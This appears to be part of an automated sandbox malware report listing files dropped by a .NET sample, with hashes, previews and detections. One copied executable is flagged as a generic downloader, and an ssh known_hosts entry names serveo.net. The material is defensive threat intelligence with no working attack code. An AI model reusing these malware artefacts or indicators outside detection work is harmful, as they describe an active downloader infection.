                                                                                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.2.0.5.1.8.4.2.7.5.6.8.9.2.2.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.2.0.5.1.8.4.3.7.1.0.0.1.6.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.2.d.d.4.9.5.a.e.-.2.f.7.5.-.4.7.2.c.-.b.3.f.f.-.2.c.e.6.1.e.b.2.5.5.a.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.5.b.e.8.d.c.3.-.4.6.e.4.-.4.8.7.7.-.b.8.8.e.-.e.8.e.a.c.4.f.4.b.5.1.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.v.k.e.f.q.4.c.v...o.i.l...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.H.a.b.9.b.8.4.c.f.0.b.e.0.9.9.b.2.6.b.5.d.8.b.d.8.e.f.a.c.0.2.9.1.7.c...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.f.8.8.-.0.0.0.1.-.0.0.1.4.-.1.1.e.6.-.4.8.3.b.3.4.5.c.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.6.a.d.d.9.e.2.6.2.e.9.1.3.a.e.8.a.e.d.4.2.5.1.a.8.a.0.0.5.3.3.0.0.0.0.0.0.0.0.!.0.0.0.0.5.b.4.8.d.3.2.a.c.a.1.f.7.7.0.5.c.0.3.e.2.b.d.
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:Mini DuMP crash report, 16 streams, Sat Feb 10 15:17:23 2024, 0x1205a4 type
                                                                                                    Category:dropped
                                                                                                    Size (bytes):744738
                                                                                                    Entropy (8bit):2.9709841894198212
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:DnDLp7S/mYF0UhPrxl3ozejFDcN+hHzsZ4oakRPcLRxBzcSMpUNauA1CCq4/ngp6:v2zU+xzaIgE3MpTq4/gp3Qa6+2
                                                                                                    MD5:50CEE141B6A528A99DD4F05900D33751
                                                                                                    SHA1:D0CBEBBBF89C29E411F2D067C6B80E1A5C950BD1
                                                                                                    SHA-256:38F3BFD3A68F925464D525E9A676B382D9B17CD6A48C47C084E28293D0B82ADE
                                                                                                    SHA-512:4563D44FC5DD35B2BB9A9705A1861E698BB6F3544CAD3431704BF8A48873D6FF3CE141D1D7C86763717CDB65DA5B840034C44C86333763E9A60E3FB67BB3F1BB
                                                                                                    Malicious:false
                                                                                                    Preview:MDMP..a..... ..........e.........................%..........<....1...........1......._.."...........l.......8...........T............m..:...........pP..........\R..............................................................................eJ.......R......Lw......................T...........|..e.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .S.u.m.m.e.r. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):9074
                                                                                                    Entropy (8bit):3.706987583444449
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:R6l7wVeJeP9UK6YEfqGgmfZ22VKcJprP89bGbIfiCm:R6lXJe9UK6YECGgmfE2VHEGkfO
                                                                                                    MD5:B7EEBD7DDE9F9346C004426EF7E9285C
                                                                                                    SHA1:BBDC2419A74E5E87623CB49668CB64EF186A8EFB
                                                                                                    SHA-256:720E58F20F931C8990B2E2FC684F254003F95E54CF66E3E6F30D4120E7CEBBC1
                                                                                                    SHA-512:6C32FE678F258B6B3328511509BF3D642901D1AED046B46F773CD9FE1E9DF9FC55BE604182920975B4ABA7D49DD7EE7D2D6A2772F6BA33FFF96696C6FEDAF7FB
                                                                                                    Malicious:false
                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.8.0.7.2.<./.P.i.
                                                                                                    Process:C:\Windows\System32\WerFault.exe
                                                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4845
                                                                                                    Entropy (8bit):4.480097738711733
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:cvIwWl8zsTJg771I9snWpW8VYPYm8M4JEHqHFNIyq8vcHquyDg4Mhudd:uIjftI7vW7VnJHMWPuyDg4Mhwd
                                                                                                    MD5:C6C49753428EC5380CC37E96E3B673D3
                                                                                                    SHA1:0E2ECEB6D5FD08E35AAAEDB57594070504AAC059
                                                                                                    SHA-256:3FF9C8077B9660804B2B607CFBEACD83E8143FE545E83508B4A365EF257A6FEC
                                                                                                    SHA-512:F0AA8DBA794AE193837D5322361461A12609F306E0193F6EFEB03989B9DF3976B21F341A2DFCD04CA8E9CD5AD8C594362244013A673AA534AE6AB889871AA7E9
                                                                                                    Malicious:false
                                                                                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="187580" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                                                    Process:C:\Windows\System32\OpenSSH\ssh.exe
                                                                                                    File Type:ASCII text, with very long lines (404), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):406
                                                                                                    Entropy (8bit):5.90555968999191
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:TyFqFcWmedrh+bMcBVM5uUkZq0lbUMO9wHWSSlICnoF/:dmgSbMcBVM5A409Kw1SlIQ+/
                                                                                                    MD5:EC266D309CBAD86B3E4939F2117DFE39
                                                                                                    SHA1:CF12599FBDC167B4C01B518A0BD63D51CD83798B
                                                                                                    SHA-256:2F8ECCA5380615BCD1530817933A7EA03D2D4FDC7D6E634829AA54E40413B05D
                                                                                                    SHA-512:D2D39D9174F459146DE57C205979E7815829C37EAFD214CDCE88F90A961F04E5468290E530CF31B9B621276A86EB3A071BBF3464962E1A8E44A7478794571BAA
                                                                                                    Malicious:false
                                                                                                    Preview:serveo.net,138.68.79.95 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDxYGqSKVwJpQD1F0YIhz+bd5lpl7YesKjtrn1QD1RjQcSj724lJdCwlv4J8PcLuFFtlAA8AbGQju7qWdMN9ihdHvRcWf0tSjZ+bzwYkxaCydq4JnCrbvLJPwLFaqV1NdcOzY2NVLuX5CfY8VTHrps49LnO0QpGaavqrbk+wTWDD9MHklNfJ1zSFpQAkSQnSNSYi/M2J3hX7P0G2R7dsUvNov+UgNKpc4n9+Lq5Vmcqjqo2KhFyHP0NseDLpgjaqGJq2Kvit3QowhqZkK4K77AA65CxZjdDfpjwZSuX075F9vNi0IFpFkGJW9KlrXzI4lIzSAjPZBURhUb8nZSiPuzj..
                                                                                                    Process:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4
                                                                                                    Entropy (8bit):1.5
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:CSn:CSn
                                                                                                    MD5:FCF1D8D2F36C0CDE8ECA4B86A8FE1DF8
                                                                                                    SHA1:C7F9B0FB437533FBD302CC7DCA6D68E101ADCE87
                                                                                                    SHA-256:AA522A6BEECBEB04BEAA3F2818524C5FA79D01549B7F330F0CC0DAF925A080EE
                                                                                                    SHA-512:893B79C9DD383A0E024CD278921A99DF9EB60CEDC67C69580518016664BA11829801FF0E8CE87035B3050E616FBEE84D04CABCD4C9D90451D236A481B348E8D5
                                                                                                    Malicious:false
                                                                                                    Preview:6787
                                                                                                    Process:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview:1
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                                                                                                    File Type:CSV text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):847
                                                                                                    Entropy (8bit):5.354334472896228
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:ML9E4KQEAE4KKUNKKDE4KGKZI6KhPKIE4TKBGKoM:MxHKQEAHKKkKYHKGSI6oPtHTH0
                                                                                                    MD5:578A9969E472E71F38254887263D82A4
                                                                                                    SHA1:8ED7FC31B0F6660DBAC702BC603FBF4FE88B2F5D
                                                                                                    SHA-256:AB8369CDA9CB7709E00867CE5460553393ABF742CBD58501AD6113FDF884B938
                                                                                                    SHA-512:E55F7150298EF037848826E79EB72AD03D3D75C278D91CF0EA6AE3C04B89D4ABBD7BD2D5EB274715687012B90F51D53056F01CDBF5DDBB602711E66909C8BD87
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Xml\db3df155ec9c0595b0198c4487f36ca1\System.Xml.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Configuration\915c1ee906bd8dfc15398a4bab4acb48\System.Configuration.ni.dll",0..
                                                                                                    Process:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1119
                                                                                                    Entropy (8bit):5.345080863654519
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0Hj
                                                                                                    MD5:88593431AEF401417595E7A00FE86E5F
                                                                                                    SHA1:1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4
                                                                                                    SHA-256:ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
                                                                                                    SHA-512:1D442441F96E69D8A6D5FB7E8CF01F13AF88CA2C2D0960120151B15505DD1CADC607EF9983373BA8E422C65FADAB04A615968F335A875B5C075BB9A6D0F346C9
                                                                                                    Malicious:false
                                                                                                    Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2240
                                                                                                    Entropy (8bit):5.379131272179432
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ZWSU4y4RQmFoUeWmfgZ9tK8NPP8m7u1iMugei/ZPUyuE:ZLHyIFKL3IZ2KHVOugsE
                                                                                                    MD5:BAE959C907A8BF1C9DA9D7779AEAB956
                                                                                                    SHA1:7A5EF77FF6B9A251B38EA7284D14F31CE1F72D41
                                                                                                    SHA-256:DB9E2A6D8EF4584F7B714716AA2637B2CFD3B8F55939CFE15B0EE3DAD61D7E80
                                                                                                    SHA-512:362F8BD77889F4C6F1786B88E0AAF095174CCCD831B5BC4886659A6D3DB6693C13E17A97674B0A510A5820CAA0C6C59DD95785089203990961B9DFF9169900C3
                                                                                                    Malicious:false
                                                                                                    Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131528
                                                                                                    Entropy (8bit):5.587236079192015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:UsziYfIDSul4Z49b1KACKvCfGZ4sYRuRnsqlEr:UsvESS4Z49b1bSG2snm
                                                                                                    MD5:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    SHA1:5B48D32ACA1F7705C03E2BD592F68A2B9C9A7A22
                                                                                                    SHA-256:D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9
                                                                                                    SHA-512:B0F0E7F6354B64CAC887600690531BA93F8AEB79E746FB9848C5F16F09931E3D8B5C2AD2A617FB9C978020450B4F717F9485D468B9C6098E6F319A59B26FAD19
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[..........."...0.................. ........@.. .......................@............`.................................L...O.......8................'... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc....... ......................@..B........................H...........X.......5...................................................PK..........................................5...P...n...w...{...................................................................|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..F...o .....(r....*".(s....*.s,........*.(&....*~(....ou....!...~!...(3....".
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:modified
                                                                                                    Size (bytes):120
                                                                                                    Entropy (8bit):4.564485170699406
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:BOzReCWAMb7iDRVivmiurQlyrWRYAdMKq8QFKxrg5bvn:UaXiDRAYrQlyrKKv6c5bvn
                                                                                                    MD5:E10E8583FFEE40E89FEF7419CC14ADA4
                                                                                                    SHA1:1D97614F6E46CB7B87F96740E9C315931BDAF222
                                                                                                    SHA-256:615581F4791B9D308FDC033455A8E2F22A01CE236C185908652B8B0A93CFF589
                                                                                                    SHA-512:6139701FA1C1B937611500F4875CB000E03FDA04732BA6F7B0BA074E7FA2AFDCC8970A6C326B8754F9E1C87BE56E2DDF1293F957B6EA9C07228E062936B06AAD
                                                                                                    Malicious:false
                                                                                                    Preview:Failed to listen on prefix 'http://127.0.0.1:6787/' because it conflicts with an existing registration on the machine...
                                                                                                    Process:C:\Users\user\Desktop\jqOHOuPMJP.exe
                                                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):131528
                                                                                                    Entropy (8bit):5.587236079192015
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3072:UsziYfIDSul4Z49b1KACKvCfGZ4sYRuRnsqlEr:UsvESS4Z49b1bSG2snm
                                                                                                    MD5:869F82DF0992DC2F5155D8F69FD1C9CF
                                                                                                    SHA1:5B48D32ACA1F7705C03E2BD592F68A2B9C9A7A22
                                                                                                    SHA-256:D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9
                                                                                                    SHA-512:B0F0E7F6354B64CAC887600690531BA93F8AEB79E746FB9848C5F16F09931E3D8B5C2AD2A617FB9C978020450B4F717F9485D468B9C6098E6F319A59B26FAD19
                                                                                                    Malicious:true
                                                                                                    Yara Hits:
                                                                                                    • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe, Author: Joe Security
                                                                                                    Antivirus:
                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....[..........."...0.................. ........@.. .......................@............`.................................L...O.......8................'... ....................................................... ............... ..H............text........ ...................... ..`.rsrc...8...........................@..@.reloc....... ......................@..B........................H...........X.......5...................................................PK..........................................5...P...n...w...{...................................................................|.......................8...K.......................[......."...#...&...'...........=.......F.......8...............2...p...s...a............ ...#...'...+...c...i...i...i...i..PK......PK......PK......PK..F...o .....(r....*".(s....*.s,........*.(&....*~(....ou....!...~!...(3....".
Process: C:\Windows\System32\WerFault.exe
File Type: MS Windows registry file, NT/2000 or above
Category: dropped
Size (bytes): 1835008
Entropy (8bit): 4.466124802594884
Encrypted: false
SSDEEP: 6144:lIXfpi67eLPU9skLmb0b44WSPKaJG8nAgejZMMhA2gX4WABl0uNEdwBCswSbA:GXD944WlLZMM6YFHq+A
MD5: 0B41F0D1011D6FFA013E52F811F4F71B
SHA1: 61D222828FC0895D776ABE64598659C31B038EFA
SHA-256: 550D698638F5585C2C5605D7BF1D8D2D6CB51795D62A084A5FC1B5B69D4AED55
SHA-512: 919455EED658B8532490C95E7A333186D1B69E0636F1339834DE431CD2E132D2E5B9644570A46563326EE33E46E74A036C516A9D5834AA3C7C05DC70173DCE86
Malicious: false
Process: C:\Windows\System32\timeout.exe
File Type: ASCII text, with CRLF line terminators, with overstriking
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.41440934524794
Encrypted: false
SSDEEP: 3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
MD5: 3DD7DD37C304E70A7316FE43B69F421F
SHA1: A3754CFC33E9CA729444A95E95BCB53384CB51E4
SHA-256: 4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
SHA-512: 713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
Malicious: false
Preview: ..Waiting for 3 seconds, press a key to continue ....2.1.0..
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 5.261474995854771
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: jqOHOuPMJP.exe
File size: 14'336 bytes
MD5: 7e9a93c69aecfc2bbda9470fbd4556db
SHA1: ab0e810472a897affac1a761b49595939f6897a9
SHA256: 82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
SHA512: 59abfa455c148c88959f992864de627857e950d9abb36b49efd979da4139a50847932d9577d658d0d793802ef5a6f6b91520440af2ff983dbf04126cf909d342
SSDEEP: 384:1R8wtU1eai/zbM/XygkxOu6cyhLWi1fXlSW:1eCU1vi7blHhyhiij
TLSH: 2F522C3577E49637CABE0E7649B253404375EA068822DFDD2CC8600D5DD3B868562FB7
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....A..........."...0..............M... ...`....@.. ....................................`................................
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x404d16
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x8F4114C5 [Wed Feb 28 05:04:05 2046 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x4cc1 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x6000 | 0x59c | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x4c3c | 0x38 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
